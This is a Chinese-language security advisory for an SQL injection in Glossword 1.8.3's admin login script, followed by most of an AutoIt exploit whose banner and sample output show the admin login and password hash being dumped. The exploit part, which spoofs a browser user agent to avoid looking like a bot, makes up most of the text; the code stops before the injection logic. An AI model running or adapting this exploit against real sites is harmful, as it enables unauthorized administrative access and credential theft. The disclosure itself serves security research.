发布日期:2013-02-05
更新日期:2013-02-27
受影响系统:
sourceforge glossword 1.8.3
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 57732
Glossword是创建和发布在线多语言字典、词汇或百科全书的系统。
Glossword 1.8.3及其他版本的gw_admin/login.php脚本没有正确过滤'arPost[user_name]'参数值,允许攻击者在后端数据库内注入或操作SQL查询。
<*来源:Akastep
链接:
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#cs
==============================================================
Vulnerable Software: Glossword 1.8.3
Official site:
Download:
Vuln: SQLi
==================THIS IS A WHOLE EXPLOIT=====================
Exploit Coded In AutoIT.
To exploit this vulnerability magic_quotes_gpc must be turned off on server side.
Print screen:
POC video:
Exploit usage:
C:\0day>glossa.exe /glossword/glossword/ 2
##############################################################
# Glossword 1.8.3 SQL injection Exploit #
# Usage: glossa.exe /installdir/ UID (int) #
# DON'T HATE THE HACKER, HATE YOUR OWN CODE! #
# VULN/Exploit: AkaStep & HERO_AZE #
##############################################################
##############################################################
[*] SENDING FAKE SESSUID: ea0f5d8c7c2c8a2f9f7c3b3e5a3d4f5d [*]
##############################################################
##############################################################
[*] CMS is GLOSSWORD! [*]
##############################################################
##############################################################
[*] FETCHING VALID SESSUID [*]
##############################################################
##############################################################
[*] Got VALID SESSUID: aa0e680bef2679932393abe72b78ef03 [*]
##############################################################
##############################################################
[*] !~ P*W*N*E*D ~! [*]
--------------------------------------------------------------
[*] Login: admin [*]
--------------------------------------------------------------
[*] Password: (MD5) 260efaff0cac0f78a53ccc540e89e72d [*]
--------------------------------------------------------------
Admin Panel: hacker1.own/glossword/glossword/gw_admin/login.php
--------------------------------------------------------------
[*] Good Luck;) [*]
##############################################################
[*] DONE [*]
##############################################################
#ce
#NoTrayIcon
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_Outfile=glossa.exe
#AutoIt3Wrapper_UseUpx=n
#AutoIt3Wrapper_Change2CUI=y
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#include "WinHttp.au3"
#include <inet.au3>
#include <String.au3>
$triptrop=@CRLF & _StringRepeat('#',62) & @CRLF;
$exploitname=@CRLF & _StringRepeat('#',62) & @CRLF & _
'#' & _StringRepeat(' ',11) & 'Glossword 1.8.3 SQL injection Exploit ' & _StringRepeat(' ',11) & '#' & @CRLF & _
'# Usage: ' & @ScriptName & ' ' & ' /installdir/ ' & ' UID (int) #' & _
@CRLF & "# DON'T HATE THE HACKER, HATE YOUR OWN CODE! #" & @CRLF & _
'# VULN/Exploit: AkaStep & HERO_AZE #' & @CRLF & _StringRepeat('#',62);
ConsoleWrite(@CRLF & $exploitname & @CRLF)
$method='POST';
$vulnurl='gw_admin/login.php'
Global $sessid=0
$cmsindent='lossword'; # We will use it to identify CMS #;
$adminpanel=$vulnurl
;#~ Impersonate that We Are Not BOT or exploit.We are human who uses IE.# ~;
$useragent='Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SV1; .NET CLR 1.1.4325)';
$msg_usage="Command Line Plizzzz => " & @CRLF & "Usage: " & @ScriptName & ' ' & ' /installdir/ ' & ' UID (int)' & @CRLF
if $CmdLine[0] <> 3 Then
ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF);
MsgBox(64,"",$msg_usage);
exit;
EndIf